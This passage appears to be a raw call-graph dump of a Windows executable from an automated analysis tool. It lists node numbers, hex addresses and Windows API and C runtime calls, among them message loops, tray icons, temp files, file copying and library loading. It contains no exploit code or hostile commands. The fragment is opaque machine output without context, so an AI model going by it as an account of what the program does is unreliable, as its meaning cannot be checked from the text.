101454 2b7bee 101450->101454 101455 2b7c13 101450->101455 101452 2b7d2c 59 API calls 101451->101452 101453 2b7bf6 _memmove 101452->101453 101453->101409 101479 2b7f27 59 API calls Mailbox 101454->101479 101457 2b8029 59 API calls 101455->101457 101457->101453 101459 2b4713 GetModuleFileNameW 101458->101459 101459->101419 101461 2e1940 __write_nolock 101460->101461 101462 2b475d GetFullPathNameW 101461->101462 101463 2b4799 101462->101463 101464 2b477c 101462->101464 101465 2b7d8c 59 API calls 101463->101465 101466 2b7bcc 59 API calls 101464->101466 101467 2b4788 101465->101467 101466->101467 101470 2b7726 101467->101470 101471 2b7734 101470->101471 101472 2b7d2c 59 API calls 101471->101472 101473 2b4794 101472->101473 101473->101422 101475 2b7c5f __NMSG_WRITE 101474->101475 101476 2b8029 59 API calls 101475->101476 101477 2b7c70 _memmove 101475->101477 101478 2eed07 _memmove 101476->101478 101477->101434 101479->101453 101481 2d2c50 __alloc_osfhnd 101480->101481 101488 2d3217 101481->101488 101487 2d2c77 __alloc_osfhnd 101487->101415 101505 2d9c0b 101488->101505 101490 2d2c59 101491 2d2c88 DecodePointer DecodePointer 101490->101491 101492 2d2cb5 101491->101492 101493 2d2c65 101491->101493 101492->101493 101551 2d87a4 59 API calls _memcpy_s 101492->101551 101502 2d2c82 101493->101502 101495 2d2d18 EncodePointer EncodePointer 101495->101493 101496 2d2cc7 101496->101495 101497 2d2cec 101496->101497 101552 2d8864 61 API calls 2 library calls 101496->101552 101497->101493 101500 2d2d06 EncodePointer 101497->101500 101553 2d8864 61 API calls 2 library calls 101497->101553 101500->101495 101501 2d2d00 101501->101493 101501->101500 101554 2d3220 101502->101554 101506 2d9c1c 101505->101506 101507 2d9c2f EnterCriticalSection 101505->101507 101512 2d9c93 101506->101512 101507->101490 101509 2d9c22 101509->101507 101536 2d30b5 58 API calls 3 library calls 101509->101536 101513 2d9c9f __alloc_osfhnd 101512->101513 101514 2d9ca8 101513->101514 101515 2d9cc0 101513->101515 101537 2da16b 58 API calls 2 library calls 101514->101537 101523 2d9ce1 __alloc_osfhnd 101515->101523 101540 2d881d 58 API calls 2 library calls 101515->101540 101518 2d9cad 101538 2da1c8 58 API calls 6 library calls 101518->101538 101519 2d9cd5 101521 2d9cdc 101519->101521 101522 2d9ceb 101519->101522 101541 2d8b28 58 API calls __getptd_noexit 101521->101541 101526 2d9c0b __lock 58 API calls 101522->101526 101523->101509 101524 2d9cb4 101539 2d309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101524->101539 101528 2d9cf2 101526->101528 101530 2d9cff 101528->101530 101531 2d9d17 101528->101531 101542 2d9e2b InitializeCriticalSectionAndSpinCount 101530->101542 101543 2d2d55 101531->101543 101534 2d9d0b 101549 2d9d33 LeaveCriticalSection _doexit 101534->101549 101537->101518 101538->101524 101540->101519 101541->101523 101542->101534 101544 2d2d5e RtlFreeHeap 101543->101544 101545 2d2d87 __dosmaperr 101543->101545 101544->101545 101546 2d2d73 101544->101546 101545->101534 101550 2d8b28 58 API calls __getptd_noexit 101546->101550 101548 2d2d79 GetLastError 101548->101545 101549->101523 101550->101548 101551->101496 101552->101497 101553->101501 101557 2d9d75 LeaveCriticalSection 101554->101557 101556 2d2c87 101556->101487 101557->101556 101558 2b3633 101559 2b366a 101558->101559 101560 2b3688 101559->101560 101561 2b36e7 101559->101561 101599 2b36e5 101559->101599 101565 2b374b PostQuitMessage 101560->101565 101566 2b3695 101560->101566 101563 2ed0cc 101561->101563 101564 2b36ed 101561->101564 101562 2b36ca DefWindowProcW 101592 2b36d8 101562->101592 101613 2c1070 10 API calls Mailbox 101563->101613 101567 2b36f2 101564->101567 101568 2b3715 SetTimer RegisterWindowMessageW 101564->101568 101565->101592 101570 2ed154 101566->101570 101571 2b36a0 101566->101571 101572 2ed06f 101567->101572 101573 2b36f9 KillTimer 101567->101573 101575 2b373e CreatePopupMenu 101568->101575 101568->101592 101629 312527 71 API calls _memset 101570->101629 101576 2b36a8 101571->101576 101577 2b3755 101571->101577 101583 2ed0a8 MoveWindow 101572->101583 101584 2ed074 101572->101584 101610 2b443a Shell_NotifyIconW _memset 101573->101610 101574 2ed0f3 101614 2c1093 331 API calls Mailbox 101574->101614 101575->101592 101581 2b36b3 101576->101581 101588 2ed139 101576->101588 101603 2b44a0 101577->101603 101589 2b36be 101581->101589 101590 2ed124 101581->101590 101583->101592 101585 2ed078 101584->101585 101586 2ed097 SetFocus 101584->101586 101585->101589 101593 2ed081 101585->101593 101586->101592 101587 2b370c 101611 2b3114 DeleteObject DestroyWindow Mailbox 101587->101611 101588->101562 101628 307c36 59 API calls Mailbox 101588->101628 101589->101562 101615 2b443a Shell_NotifyIconW _memset 101589->101615 101627 312d36 81 API calls _memset 101590->101627 101591 2ed166 101591->101562 101591->101592 101612 2c1070 10 API calls Mailbox 101593->101612 101598 2ed134 101598->101592 101599->101562 101601 2ed118 101616 2b434a 101601->101616 101604 2b4539 101603->101604 101605 2b44b7 _memset 101603->101605 101604->101592 101630 2b407c 101605->101630 101607 2b4522 KillTimer SetTimer 101607->101604 101608 2b44de 101608->101607 101609 2ed4ab Shell_NotifyIconW 101608->101609 101609->101607 101610->101587 101611->101592 101612->101592 101613->101574 101614->101589 101615->101601 101617 2b4375 _memset 101616->101617 101657 2b4182 101617->101657 101621 2b4430 Shell_NotifyIconW 101623 2b4422 101621->101623 101622 2b4414 Shell_NotifyIconW 101622->101623 101625 2b407c 61 API calls 101623->101625 101624 2b43fa 101624->101621 101624->101622 101626 2b4429 101625->101626 101626->101599 101627->101598 101628->101599 101629->101591 101631 2b4098 101630->101631 101632 2b416f Mailbox 101630->101632 101652 2b7a16 101631->101652 101632->101608 101635 2ed3c8 LoadStringW 101639 2ed3e2 101635->101639 101636 2b40b3 101637 2b7bcc 59 API calls 101636->101637 101638 2b40c8 101637->101638 101638->101639 101640 2b40d9 101638->101640 101641 2b7b2e 59 API calls 101639->101641 101642 2b40e3 101640->101642 101643 2b4174 101640->101643 101646 2ed3ec 101641->101646 101644 2b7b2e 59 API calls 101642->101644 101645 2b8047 59 API calls 101643->101645 101648 2b40ed _memset _wcscpy 101644->101648 101645->101648 101647 2b7cab 59 API calls 101646->101647 101646->101648 101649 2ed40e 101647->101649 101650 2b4155 Shell_NotifyIconW 101648->101650 101651 2b7cab 59 API calls 101649->101651 101650->101632 101651->101648 101653 2d0db6 Mailbox 59 API calls 101652->101653 101654 2b7a3b 101653->101654 101655 2b8029 59 API calls 101654->101655 101656 2b40a6 101655->101656 101656->101635 101656->101636 101658 2ed423 101657->101658 101659 2b4196 101657->101659 101658->101659 101660 2ed42c DestroyIcon 101658->101660 101659->101624 101661 312f94 62 API calls _W_store_winword 101659->101661 101660->101659 101661->101624 101662 2efe27 101675 2cf944 101662->101675 101664 2efe3d 101665 2efebe 101664->101665 101666 2efe53 101664->101666 101684 2bfce0 101665->101684 101764 2b9e5d 60 API calls 101666->101764 101668 2efe92 101670 2f089c 101668->101670 101671 2efe9a 101668->101671 101766 319e4a 89 API calls 4 library calls 101670->101766 101765 31834f 59 API calls Mailbox 101671->101765 101674 2efeb2 Mailbox 101676 2cf950 101675->101676 101677 2cf962 101675->101677 101678 2b9d3c 60 API calls 101676->101678 101679 2cf968 101677->101679 101680 2cf991 101677->101680 101683 2cf95a 101678->101683 101681 2d0db6 Mailbox 59 API calls 101679->101681 101682 2b9d3c 60 API calls 101680->101682 101681->101683 101682->101683 101683->101664 101767 2b8180 101684->101767 101686 2bfd3d 101687 2f472d 101686->101687 101733 2c06f6 101686->101733 101772 2bf234 101686->101772 101874 319e4a 89 API calls 4 library calls 101687->101874 101691 2f4742 101692 2bfe3e 101693 2f488d 101692->101693 101699 2bfe4c 101692->101699 101878 3066ec 59 API calls 2 library calls 101692->101878 101693->101691 101693->101699 101880 32a2d9 85 API calls Mailbox 101693->101880 101694 2c0517 101703 2d0db6 Mailbox 59 API calls 101694->101703 101696 2d0db6 59 API calls Mailbox 101726 2bfdd3 101696->101726 101698 2f47d7 101698->101691 101876 319e4a 89 API calls 4 library calls 101698->101876 101704 2f48f9 101699->101704 101751 2f4b53 101699->101751 101776 2b837c 101699->101776 101700 2f4848 101879 3060ef 59 API calls 2 library calls 101700->101879 101711 2c0545 _memmove 101703->101711 101712 2f4917 101704->101712 101882 2b85c0 101704->101882 101707 2f4755 101707->101698 101875 2bf6a3 331 API calls 101707->101875 101709 2f48b2 Mailbox 101709->101699 101881 3066ec 59 API calls 2 library calls 101709->101881 101718 2d0db6 Mailbox 59 API calls 101711->101718 101715 2f4928 101712->101715 101720 2b85c0 59 API calls 101712->101720 101713 2bfea4 101721 2f4ad6 101713->101721 101722 2bff32 101713->101722 101758 2c0179 Mailbox _memmove 101713->101758 101714 2f486b 101716 2b9ea0 331 API calls 101714->101716 101715->101758 101890 3060ab 59 API calls Mailbox 101715->101890 101716->101693 101762 2c0106 _memmove 101718->101762 101720->101715 101898 319ae7 60 API calls 101721->101898 101723 2d0db6 Mailbox 59 API calls 101722->101723 101728 2bff39 101723->101728 101726->101691 101726->101692 101726->101694 101726->101696 101726->101707 101726->101711 101727 2b9ea0 331 API calls 101726->101727 101739 2f480c 101726->101739 101727->101726 101728->101733 101783 2c09d0 101728->101783 101729 2f4a4d 101730 2b9ea0 331 API calls 101729->101730 101731 2f4a87 101730->101731 101731->101691 101893 2b84c0 101731->101893 101873 319e4a 89 API calls 4 library calls 101733->101873 101735 2bffb2 101735->101711 101735->101733 101742 2bffe6 101735->101742 101877 319e4a 89 API calls 4 library calls 101739->101877 101740 2f4ab2 101897 319e4a 89 API calls 4 library calls 101740->101897 101746 2b8047 59 API calls 101742->101746 101749 2c0007 101742->101749 101744 2b9c90 Mailbox 59 API calls 101744->101762 101745 2b9d3c 60 API calls 101745->101758 101746->101749 101747 2c0398 101747->101674 101748 2d0db6 59 API calls Mailbox 101748->101758 101749->101733 101750 2f4b24 101749->101750 101754 2c004c 101749->101754 101752 2b9d3c 60 API calls 101750->101752 101751->101691 101899 319e4a 89 API calls 4 library calls 101751->101899 101752->101751 101753 2c00d8 101755 2b9d3c 60 API calls 101753->101755 101754->101733 101754->101751 101754->101753 101757 2c00eb 101755->101757 101756 2f4a1c 101760 2d0db6 Mailbox 59 API calls 101756->101760 101757->101733 101860 2b82df 101757->101860 101758->101729 101758->101733 101758->101740 101758->101745 101758->101747 101758->101748 101758->101756 101871 2b8740 68 API calls __cinit 101758->101871 101872 2b8660 68 API calls 101758->101872 101891 315937 68 API calls 101758->101891 101892 2b89b3 69 API calls Mailbox 101758->101892 101760->101729 101762->101744 101762->101758 101763 2c0162 101762->101763 101763->101674 101764->101668 101765->101674 101766->101674 101768 2b818f 101767->101768 101771 2b81aa 101767->101771 101769 2b7e4f 59 API calls 101768->101769 101770 2b8197 CharUpperBuffW 101769->101770 101770->101771 101771->101686 101773 2bf251 101772->101773 101774 2bf272 101773->101774 101900 319e4a 89 API calls 4 library calls 101773->101900 101774->101726 101777 2eedbd 101776->101777 101778 2b838d 101776->101778 101779 2d0db6 Mailbox 59 API calls 101778->101779 101780 2b8394 101779->101780 101781 2b83b5 101780->101781 101901 2b8634 59 API calls Mailbox 101780->101901 101781->101704 101781->101713 101784 2f4cc3 101783->101784 101795 2c09f5 101783->101795 101961 319e4a 89 API calls 4 library calls 101784->101961 101786 2c0cfa 101786->101735 101788 2c0ee4 101788->101786 101790 2c0ef1 101788->101790 101959 2c1093 331 API calls Mailbox 101790->101959 101791 2c0a4b PeekMessageW 101824 2c0a05 Mailbox 101791->101824 101794 2c0ef8 LockWindowUpdate DestroyWindow GetMessageW 101794->101786 101797 2c0f2a 101794->101797 101795->101824 101962 2b9e5d 60 API calls 101795->101962 101963 306349 331 API calls 101795->101963 101796 2f4e81 Sleep 101796->101824 101800 2f5c58 TranslateMessage DispatchMessageW GetMessageW 101797->101800 101798 2c0ce4 101798->101786 101958 2c1070 10 API calls Mailbox 101798->101958 101800->101800 101801 2f5c88 101800->101801 101801->101786 101802 2c0ea5 TranslateMessage DispatchMessageW 101803 2c0e43 PeekMessageW 101802->101803 101803->101824 101804 2f4d50 TranslateAcceleratorW 101804->101803 101804->101824 101805 2b9e5d 60 API calls 101805->101824 101806 2c0d13 timeGetTime 101806->101824 101807 2f581f WaitForSingleObject 101813 2f583c GetExitCodeProcess CloseHandle 101807->101813 101807->101824 101809 2d0db6 59 API calls Mailbox 101809->101824 101810 2c0e5f Sleep 101834 2c0e70 Mailbox 101810->101834 101811 2b8047 59 API calls 101811->101824 101812 2b7667 59 API calls 101812->101834 101814 2c0f95 101813->101814 101814->101735 101815 2f5af8 Sleep 101815->101834 101817 2d049f timeGetTime 101817->101834 101819 2c0f4e timeGetTime 101960 2b9e5d 60 API calls 101819->101960 101822 2f5b8f GetExitCodeProcess 101828 2f5bbb CloseHandle 101822->101828 101829 2f5ba5 WaitForSingleObject 101822->101829 101823 2b9837 84 API calls 101823->101824 101824->101791 101824->101796 101824->101798 101824->101802 101824->101803 101824->101804 101824->101805 101824->101806 101824->101807 101824->101809 101824->101810 101824->101811 101824->101814 101824->101815 101824->101819 101824->101823 101824->101834 101840 2b9ea0 304 API calls 101824->101840 101843 2bfce0 304 API calls 101824->101843 101845 2b7de1 59 API calls 101824->101845 101848 319e4a 89 API calls 101824->101848 101849 2b9c90 59 API calls Mailbox 101824->101849 101850 2b84c0 69 API calls 101824->101850 101851 2b82df 59 API calls 101824->101851 101852 30617e 59 API calls Mailbox 101824->101852 101853 2b89b3 69 API calls 101824->101853 101854 2f55d5 VariantClear 101824->101854 101855 2b8cd4 59 API calls Mailbox 101824->101855 101856 2f566b VariantClear 101824->101856 101857 2f5419 VariantClear 101824->101857 101858 306e8f 59 API calls 101824->101858 101859 2bb73c 304 API calls 101824->101859 101902 2be6a0 101824->101902 101933 2bf460 101824->101933 101952 2b31ce 101824->101952 101957 2be420 331 API calls 101824->101957 101964 336018 59 API calls 101824->101964 101965 319a15 59 API calls Mailbox 101824->101965 101966 30d4f2 59 API calls 101824->101966 101967 3060ef 59 API calls 2 library calls 101824->101967 101968 2b8401 59 API calls 101824->101968 101826 335f25 110 API calls 101826->101834 101827 2bb7dd 109 API calls 101827->101834 101828->101834 101829->101824 101829->101828 101831 2f5874 101831->101814 101832 2f5078 Sleep 101832->101824 101833 2f5c17 Sleep 101833->101824 101834->101812 101834->101814 101834->101817 101834->101822 101834->101824 101834->101826 101834->101827 101834->101831 101834->101832 101834->101833 101837 2b7de1 59 API calls 101834->101837 101969 312408 60 API calls 101834->101969 101970 2b9e5d 60 API calls 101834->101970 101971 2b89b3 69 API calls Mailbox 101834->101971 101972 2bb73c 331 API calls 101834->101972 101973 3064da 60 API calls 101834->101973 101974 315244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 101834->101974 101975 313c55 66 API calls Mailbox 101834->101975 101837->101834 101840->101824 101843->101824 101845->101824 101848->101824 101849->101824 101850->101824 101851->101824 101852->101824 101853->101824 101854->101824 101855->101824 101856->101824 101857->101824 101858->101824 101859->101824 101861 2b82f2 101860->101861 101862 2eeda1 101860->101862 101863 2b8339 Mailbox 101861->101863 101866 2b85c0 59 API calls 101861->101866 101867 2b831c 101861->101867 101864 2eedb1 101862->101864 103010 3061a4 59 API calls 101862->103010 101863->101762 101866->101867 101868 2b8322 101867->101868 101869 2b85c0 59 API calls 101867->101869 101868->101863 101870 2b9c90 Mailbox 59 API calls 101868->101870 101869->101868 101870->101863 101871->101758 101872->101758 101873->101687 101874->101691 101875->101698 101876->101691 101877->101691 101878->101700 101879->101714 101880->101709 101881->101709 101883 2b85ce 101882->101883 101889 2b85f6 101882->101889 101884 2b85dc 101883->101884 101885 2b85c0 59 API calls 101883->101885 101886 2b85e2 101884->101886 101887 2b85c0 59 API calls 101884->101887 101885->101884 101888 2b9c90 Mailbox 59 API calls 101886->101888 101886->101889 101887->101886 101888->101889 101889->101712 101890->101758 101891->101758 101892->101758 101894 2b84cb 101893->101894 101896 2b84f2 101894->101896 103011 2b89b3 69 API calls Mailbox 101894->103011 101896->101740 101897->101691 101898->101742 101899->101691 101900->101774 101901->101781 101903 2be6d5 101902->101903 101904 2be73f 101903->101904 101905 2f3aa9 101903->101905 101916 2be799 101903->101916 101910 2b7667 59 API calls 101904->101910 101904->101916 101906 2b9ea0 331 API calls 101905->101906 101907 2f3abe 101906->101907 101932 2be970 Mailbox 101907->101932 101977 319e4a 89 API calls 4 library calls 101907->101977 101908 2b7667 59 API calls 101908->101916 101911 2f3b04 101910->101911 101914 2d2d40 __cinit 67 API calls 101911->101914 101912 2d2d40 __cinit 67 API calls 101912->101916 101913 2f3b26 101913->101824 101914->101916 101915 2b84c0 69 API calls 101915->101932 101916->101908 101916->101912 101916->101913 101918 2be95a 101916->101918 101916->101932 101917 2b9ea0 331 API calls 101917->101932 101918->101932 101978 319e4a 89 API calls 4 library calls 101918->101978 101920 2b8d40 59 API calls 101920->101932 101921 2b9c90 Mailbox 59 API calls 101921->101932 101924 319e4a 89 API calls 101924->101932 101929 2bf195 101982 319e4a 89 API calls 4 library calls 101929->101982 101930 2f3e25 101930->101824 101931 2bea78 101931->101824 101932->101915 101932->101917 101932->101920 101932->101921 101932->101924 101932->101929 101932->101931 101976 2b7f77 59 API calls 2 library calls 101932->101976 101979 306e8f 59 API calls 101932->101979 101980 32c5c3 331 API calls 101932->101980 101981 32b53c 331 API calls Mailbox 101932->101981 101983 3293c6 331 API calls Mailbox 101932->101983 101934 2bf4ba 101933->101934 101935 2bf650 101933->101935 101937 2f441e 101934->101937 101938 2bf4c6 101934->101938 101936 2b7de1 59 API calls 101935->101936 101944 2bf58c Mailbox 101936->101944 102083 32bc6b 331 API calls Mailbox 101937->102083 102082 2bf290 331 API calls 2 library calls 101938->102082 101941 2f442c 101945 2bf630 101941->101945 102084 319e4a 89 API calls 4 library calls 101941->102084 101943 2bf4fd 101943->101941 101943->101944 101943->101945 101984 313c37 101944->101984 101987 31cb7a 101944->101987 102067 32445a 101944->102067 102076 2b4e4a 101944->102076 101945->101824 101946 2b9c90 Mailbox 59 API calls 101947 2bf5e3 101946->101947 101947->101945 101947->101946 101953 2b3212 101952->101953 101956 2b31e0 101952->101956 101953->101824 101954 2b3205 IsDialogMessageW 101954->101953 101954->101956 101955 2ecf32 GetClassLongW 101955->101954 101955->101956 101956->101953 101956->101954 101956->101955 101957->101824 101958->101788 101959->101794 101960->101824 101961->101795 101962->101795 101963->101795 101964->101824 101965->101824 101966->101824 101967->101824 101968->101824 101969->101834 101970->101834 101971->101834 101972->101834 101973->101834 101974->101834 101975->101834 101976->101932 101977->101932 101978->101932 101979->101932 101980->101932 101981->101932 101982->101930 101983->101932 102085 31445a GetFileAttributesW 101984->102085 101988 2b7667 59 API calls 101987->101988 101989 31cbaf 101988->101989 101990 2b7667 59 API calls 101989->101990 101991 31cbb8 101990->101991 101992 31cbcc 101991->101992 102276 2b9b3c 59 API calls 101991->102276 101994 2b9837 84 API calls 101992->101994 101995 31cbe9 101994->101995 101996 31cc0b 101995->101996 101997 31ccea 101995->101997 102003 31cd1a Mailbox 101995->102003 101999 2b9837 84 API calls 101996->101999 102089 2b4ddd 101997->102089 102001 31cc17 101999->102001 102002 2b8047 59 API calls 102001->102002 102008 31cc23 102002->102008 102003->101947 102004 2b4ddd 136 API calls 102006 31cd16 102004->102006 102005 2b7667 59 API calls 102007 31cd4b 102005->102007 102006->102003 102006->102005 102009 2b7667 59 API calls 102007->102009 102010 31cc37 102008->102010 102011 31cc69 102008->102011 102012 31cd54 102009->102012 102013 2b8047 59 API calls 102010->102013 102014 2b9837 84 API calls 102011->102014 102015 2b7667 59 API calls 102012->102015 102017 31cc47 102013->102017 102018 31cc76 102014->102018 102016 31cd5d 102015->102016 102019 2b7667 59 API calls 102016->102019 102020 2b7cab 59 API calls 102017->102020 102021 2b8047 59 API calls 102018->102021 102023 31cd66 102019->102023 102024 31cc51 102020->102024 102022 31cc82 102021->102022 102277 314a31 GetFileAttributesW 102022->102277 102026 2b9837 84 API calls 102023->102026 102027 2b9837 84 API calls 102024->102027 102029 31cd73 102026->102029 102030 31cc5d 102027->102030 102028 31cc8b 102031 31cc9e 102028->102031 102034 2b79f2 59 API calls 102028->102034 102113 2b459b 102029->102113 102033 2b7b2e 59 API calls 102030->102033 102036 2b9837 84 API calls 102031->102036 102042 31cca4 102031->102042 102033->102011 102034->102031 102035 31cd8e 102164 2b79f2 102035->102164 102038 31cccb 102036->102038 102278 3137ef 75 API calls Mailbox 102038->102278 102041 31cdd1 102043 2b8047 59 API calls 102041->102043 102042->102003 102045 31cddf 102043->102045 102044 2b79f2 59 API calls 102046 31cdae 102044->102046 102047 2b7b2e 59 API calls 102045->102047 102046->102041 102049 2b7bcc 59 API calls 102046->102049 102048 31cded 102047->102048 102050 2b7b2e 59 API calls 102048->102050 102051 31cdc3 102049->102051 102052 31cdfb 102050->102052 102053 2b7bcc 59 API calls 102051->102053 102054 2b7b2e 59 API calls 102052->102054 102053->102041 102055 31ce09 102054->102055 102056 2b9837 84 API calls 102055->102056 102057 31ce15 102056->102057 102167 314071 102057->102167 102059 31ce26 102060 313c37 3 API calls 102059->102060 102061 31ce30 102060->102061 102062 2b9837 84 API calls 102061->102062 102066 31ce61 102061->102066 102063 31ce4e 102062->102063 102221 319155 102063->102221 102065 2b4e4a 84 API calls 102065->102003 102066->102065 102068 2b9837 84 API calls 102067->102068 102069 324494 102068->102069 102976 2b6240 102069->102976 102071 3244c9 102075 3244cd 102071->102075 103001 2b9a98 59 API calls Mailbox 102071->103001 102072 3244a4 102072->102071 102073 2b9ea0 331 API calls 102072->102073 102073->102071 102075->101947 102077 2b4e5b 102076->102077 102078 2b4e54 102076->102078 102080 2b4e7b FreeLibrary 102077->102080 102081 2b4e6a 102077->102081 102079 2d53a6 __fcloseall 83 API calls 102078->102079 102079->102077 102080->102081 102081->101947 102082->101943 102083->101941 102084->101945 102086 314475 FindFirstFileW 102085->102086 102087 313c3e 102085->102087 102086->102087 102088 31448a FindClose 102086->102088 102087->101947 102088->102087 102279 2b4bb5 102089->102279 102094 2b4e08 LoadLibraryExW 102289 2b4b6a 102094->102289 102095 2ed8e6 102096 2b4e4a 84 API calls 102095->102096 102098 2ed8ed 102096->102098 102100 2b4b6a 3 API calls 102098->102100 102102 2ed8f5 102100->102102 102315 2b4f0b 102102->102315 102103 2b4e2f 102103->102102 102104 2b4e3b 102103->102104 102105 2b4e4a 84 API calls 102104->102105 102107 2b4e40 102105->102107 102107->102004 102107->102006 102110 2ed91c 102323 2b4ec7 102110->102323 102114 2b7667 59 API calls 102113->102114 102115 2b45b1 102114->102115 102116 2b7667 59 API calls 102115->102116 102117 2b45b9 102116->102117 102118 2b7667 59 API calls 102117->102118 102119 2b45c1 102118->102119 102120 2b7667 59 API calls 102119->102120 102121 2b45c9 102120->102121 102122 2b45fd 102121->102122 102123 2ed4d2 102121->102123 102124 2b784b 59 API calls 102122->102124 102125 2b8047 59 API calls 102123->102125 102126 2b460b 102124->102126 102127 2ed4db 102125->102127 102128 2b7d2c 59 API calls 102126->102128 102129 2b7d8c 59 API calls 102127->102129 102130 2b4615 102128->102130 102133 2b4640 102129->102133 102132 2b784b 59 API calls 102130->102132 102130->102133 102131 2b4680 102136 2b784b 59 API calls 102131->102136 102134 2b4636 102132->102134 102133->102131 102135 2b465f 102133->102135 102146 2ed4fb 102133->102146 102137 2b7d2c 59 API calls 102134->102137 102139 2b79f2 59 API calls 102135->102139 102140 2b4691 102136->102140 102137->102133 102138 2ed5cb 102141 2b7bcc 59 API calls 102138->102141 102142 2b4669 102139->102142 102143 2b46a3 102140->102143 102144 2b8047 59 API calls 102140->102144 102159 2ed588 102141->102159 102142->102131 102150 2b784b 59 API calls 102142->102150 102145 2b46b3 102143->102145 102147 2b8047 59 API calls 102143->102147 102144->102143 102149 2b46ba 102145->102149 102151 2b8047 59 API calls 102145->102151 102146->102138 102148 2ed5b4 102146->102148 102158 2ed532 102146->102158 102147->102145 102148->102138 102154 2ed59f 102148->102154 102152 2b8047 59 API calls 102149->102152 102161 2b46c1 Mailbox 102149->102161 102150->102131 102151->102149 102152->102161 102153 2b79f2 59 API calls 102153->102159 102157 2b7bcc 59 API calls 102154->102157 102155 2ed590 102156 2b7bcc 59 API calls 102155->102156 102156->102159 102157->102159 102158->102155 102162 2ed57b 102158->102162 102159->102131 102159->102153 102607 2b7924 59 API calls 2 library calls 102159->102607 102161->102035 102163 2b7bcc 59 API calls 102162->102163 102163->102159 102165 2b7e4f 59 API calls 102164->102165 102166 2b79fd 102165->102166 102166->102041 102166->102044 102168 31408d 102167->102168 102169 3140a0 102168->102169 102170 314092 102168->102170 102172 2b7667 59 API calls 102169->102172 102171 2b8047 59 API calls 102170->102171 102220 31409b Mailbox 102171->102220 102173 3140a8 102172->102173 102174 2b7667 59 API calls 102173->102174 102175 3140b0 102174->102175 102176 2b7667 59 API calls 102175->102176 102177 3140bb 102176->102177 102178 2b7667 59 API calls 102177->102178 102179 3140c3 102178->102179 102180 2b7667 59 API calls 102179->102180 102181 3140cb 102180->102181 102182 2b7667 59 API calls 102181->102182 102183 3140d3 102182->102183 102184 2b7667 59 API calls 102183->102184 102185 3140db 102184->102185 102186 2b7667 59 API calls 102185->102186 102187 3140e3 102186->102187 102188 2b459b 59 API calls 102187->102188 102189 3140fa 102188->102189 102190 2b459b 59 API calls 102189->102190 102191 314113 102190->102191 102192 2b79f2 59 API calls 102191->102192 102193 31411f 102192->102193 102194 314132 102193->102194 102195 2b7d2c 59 API calls 102193->102195 102196 2b79f2 59 API calls 102194->102196 102195->102194 102197 31413b 102196->102197 102198 31414b 102197->102198 102199 2b7d2c 59 API calls 102197->102199 102200 2b8047 59 API calls 102198->102200 102199->102198 102201 314157 102200->102201 102202 2b7b2e 59 API calls 102201->102202 102203 314163 102202->102203 102608 314223 59 API calls 102203->102608 102205 314172 102609 314223 59 API calls 102205->102609 102207 314185 102208 2b79f2 59 API calls 102207->102208 102209 31418f 102208->102209 102210 314194 102209->102210 102211 3141a6 102209->102211 102212 2b7cab 59 API calls 102210->102212 102213 2b79f2 59 API calls 102211->102213 102214 3141a1 102212->102214 102215 3141af 102213->102215 102219 2b7b2e 59 API calls 102214->102219 102216 3141cd 102215->102216 102218 2b7cab 59 API calls 102215->102218 102217 2b7b2e 59 API calls 102216->102217 102217->102220 102218->102214 102219->102216 102220->102059 102222 319162 __write_nolock 102221->102222 102223 2d0db6 Mailbox 59 API calls 102222->102223 102224 3191bf 102223->102224 102225 2b522e 59 API calls 102224->102225 102226 3191c9 102225->102226 102227 318f5f GetSystemTimeAsFileTime 102226->102227 102228 3191d4 102227->102228 102229 2b4ee5 85 API calls 102228->102229 102230 3191e7 _wcscmp 102229->102230 102231 3192b8 102230->102231 102232 31920b 102230->102232 102233 319734 96 API calls 102231->102233 102640 319734 102232->102640 102249 319284 _wcscat 102233->102249 102237 2b4f0b 74 API calls 102238 3192dd 102237->102238 102240 2b4f0b 74 API calls 102238->102240 102239 3192c1 102239->102066 102242 3192ed 102240->102242 102241 319239 _wcscat _wcscpy 102647 2d40fb 58 API calls __wsplitpath_helper 102241->102647 102243 2b4f0b 74 API calls 102242->102243 102245 319308 102243->102245 102246 2b4f0b 74 API calls 102245->102246 102247 319318 102246->102247 102248 2b4f0b 74 API calls 102247->102248 102250 319333 102248->102250 102249->102237 102249->102239 102251 2b4f0b 74 API calls 102250->102251 102252 319343 102251->102252 102253 2b4f0b 74 API calls 102252->102253 102254 319353 102253->102254 102255 2b4f0b 74 API calls 102254->102255 102256 319363 102255->102256 102610 3198e3 GetTempPathW GetTempFileNameW 102256->102610 102258 31936f 102259 2d525b 115 API calls 102258->102259 102269 319380 102259->102269 102260 31943a 102624 2d53a6 102260->102624 102262 319445 102264 31944b DeleteFileW 102262->102264 102265 31945f 102262->102265 102263 2b4f0b 74 API calls 102263->102269 102264->102239 102266 319505 CopyFileW 102265->102266 102271 319469 _wcsncpy 102265->102271 102267 31951b DeleteFileW 102266->102267 102268 31952d DeleteFileW 102266->102268 102267->102239 102637 3198a2 CreateFileW 102268->102637 102269->102239 102269->102260 102269->102263 102611 2d4863 102269->102611 102648 318b06 102271->102648 102275 3194f4 DeleteFileW 102275->102239 102276->101992 102277->102028 102278->102042 102328 2b4c03 102279->102328 102282 2b4bec FreeLibrary 102283 2b4bf5 102282->102283 102286 2d525b 102283->102286 102284 2b4c03 2 API calls 102285 2b4bdc 102284->102285 102285->102282 102285->102283 102332 2d5270 102286->102332 102288 2b4dfc 102288->102094 102288->102095 102413 2b4c36 102289->102413 102292 2b4c36 2 API calls 102295 2b4b8f 102292->102295 102293 2b4baa 102296 2b4c70 102293->102296 102294 2b4ba1 FreeLibrary 102294->102293 102295->102293 102295->102294 102297 2d0db6 Mailbox 59 API calls 102296->102297 102298 2b4c85 102297->102298 102299 2b522e 59 API calls 102298->102299 102300 2b4c91 _memmove 102299->102300 102301 2b4ccc 102300->102301 102302 2b4d89 102300->102302 102303 2b4dc1 102300->102303 102304 2b4ec7 69 API calls 102301->102304 102417 2b4e89 CreateStreamOnHGlobal 102302->102417 102428 31991b 95 API calls 102303->102428 102312 2b4cd5 102304->102312 102307 2b4f0b 74 API calls 102307->102312 102308 2b4d69 102308->102103 102310 2ed8a7 102311 2b4ee5 85 API calls 102310->102311 102313 2ed8bb 102311->102313 102312->102307 102312->102308 102312->102310 102423 2b4ee5 102312->102423 102314 2b4f0b 74 API calls 102313->102314 102314->102308 102316 2ed9cd 102315->102316 102317 2b4f1d 102315->102317 102452 2d55e2 102317->102452 102320 319109 102584 318f5f 102320->102584 102322 31911f 102322->102110 102324 2b4ed6 102323->102324 102327 2ed990 